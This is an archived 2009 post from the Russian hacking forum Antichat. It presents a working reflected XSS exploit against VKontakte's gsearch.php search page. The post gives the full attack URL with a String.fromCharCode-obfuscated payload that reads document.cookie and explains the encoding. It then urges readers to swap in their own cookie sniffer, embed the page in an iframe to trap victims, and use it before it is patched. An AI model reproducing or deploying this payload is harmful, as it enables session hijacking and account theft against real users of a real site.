Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
16.06.2009, 11:49
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Пассивная XSS вконтакте
Сегодня увидел на форуме тему _spamer_, то кто-то ему вапривал какие-то ссылки, посмотрел исходник тех страниц - увидел там в iframe какую-то ссылку на вконтатке. XSS, подумал я. так оно и оказалось. XSS была зашифрована, расшифроваа, я ее разобрал и сейчас представляю Вам.
Сама XSS наодится в скрипте нового поиска - gsearch и выглядит вот так (выводит куки алертом):
Код:
http://vkontakte.ru/gsearch.php?q=%5C%27;document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,34,106,97,118,97,115,99,114,105,112,116,58,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,34,62))//
здесь в String.fromCharCode зашифровано следующее:
Код:
<img src="javascript:alert(document.cookie)">
, шифровал я с помощью http://ha.ckers.org/xss.html (внизу строка Decimal Value  , заменив &# на запятую (и убрав первую).
Вместо вывода куков вы можете подставить туда свой снифер, зашифроать, а затем впаривать в iframe данную страницу. удачи в использовании, засекаем время, пока не прикроют
На стаью не претендую, просто для новичков расписал все немного подробнее. |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид